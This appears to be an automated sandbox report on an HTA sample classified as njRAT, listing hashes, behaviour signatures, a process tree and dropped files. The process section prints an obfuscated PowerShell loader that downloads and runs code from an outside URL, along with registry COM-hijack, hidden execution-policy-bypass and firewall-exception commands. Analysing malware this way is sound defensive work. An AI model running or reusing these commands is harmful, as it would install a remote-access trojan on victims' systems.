Analysis
- max time kernel: 150s
- max time network: 160s
- platform: windows10-2004_x64
- resource: win10v2004-20220721-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-08-2022 19:13
Static task: static1
Behavioral task: behavioral1 (Sample: enc2.hta; Resource: win7-20220715-en)
Behavioral task: behavioral2 (Sample: enc2.hta; Resource: win10v2004-20220721-en)
Behavioral task: behavioral3 (Sample: enc3.hta; Resource: win7-20220718-en)
Behavioral task: behavioral4 (Sample: enc3.hta; Resource: win10v2004-20220721-en)
General
- Target: enc3.hta
- Size: 4KB
- MD5: 586ddb57373ee157da834b1c83da00af
- SHA1: d240d7266f86bc74817fc45556d0d4cae4424efc
- SHA256: 06769b16f5a4d86ab1c87f7811b6ed4964814cb469e01321c888dab9a2bf5696
- SHA512: 467b362ba0feed6b6a15ce2ff767bf2e2503640f05369beba98b6dd67709a632f23b0186f7c21ecd330fd4911c19a68a6fe8e51649a7a983426fd1f2222a6b0e
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
- reg_key: Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: POWERSHELL.exe, POWERSHELL.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4576 | 3968 | POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1140 | 3968 | POWERSHELL.exe
-
Blocklisted process makes network request 1 IoCs
Processes: POWERSHELL.exe
flow | pid | process
6 | 4576 | POWERSHELL.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description | pid | process | target process
PID 2412 set thread context of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
-
Modifies registry class 4 IoCs
Processes: reg.exe, reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid | process
4576 | POWERSHELL.exe
4576 | POWERSHELL.exe
4036 | powershell.exe
4036 | powershell.exe
1140 | POWERSHELL.exe
1140 | POWERSHELL.exe
2412 | powershell.exe
2412 | powershell.exe
2412 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, cmd.exe, cmd.exe, powershell.exe, aspnet_compiler.exe
description | pid | process | target process
PID 4576 wrote to memory of 4036 | 4576 | POWERSHELL.exe | powershell.exe
PID 4576 wrote to memory of 4036 | 4576 | POWERSHELL.exe | powershell.exe
PID 4036 wrote to memory of 3800 | 4036 | powershell.exe | WScript.exe
PID 4036 wrote to memory of 3800 | 4036 | powershell.exe | WScript.exe
PID 1140 wrote to memory of 5068 | 1140 | POWERSHELL.exe | cmd.exe
PID 1140 wrote to memory of 5068 | 1140 | POWERSHELL.exe | cmd.exe
PID 5068 wrote to memory of 5052 | 5068 | cmd.exe | reg.exe
PID 5068 wrote to memory of 5052 | 5068 | cmd.exe | reg.exe
PID 5068 wrote to memory of 4528 | 5068 | cmd.exe | reg.exe
PID 5068 wrote to memory of 4528 | 5068 | cmd.exe | reg.exe
PID 5068 wrote to memory of 860 | 5068 | cmd.exe | cmd.exe
PID 5068 wrote to memory of 860 | 5068 | cmd.exe | cmd.exe
PID 860 wrote to memory of 2412 | 860 | cmd.exe | powershell.exe
PID 860 wrote to memory of 2412 | 860 | cmd.exe | powershell.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 2412 wrote to memory of 1400 | 2412 | powershell.exe | aspnet_compiler.exe
PID 1400 wrote to memory of 2976 | 1400 | aspnet_compiler.exe | netsh.exe
PID 1400 wrote to memory of 2976 | 1400 | aspnet_compiler.exe | netsh.exe
PID 1400 wrote to memory of 2976 | 1400 | aspnet_compiler.exe | netsh.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@[email protected]_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 
'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat 1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat"" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f 3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f 3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'" 1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 3⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1
Filesize: 604KB
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat
Filesize: 706B
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1
Filesize: 3KB
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
Filesize: 3KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B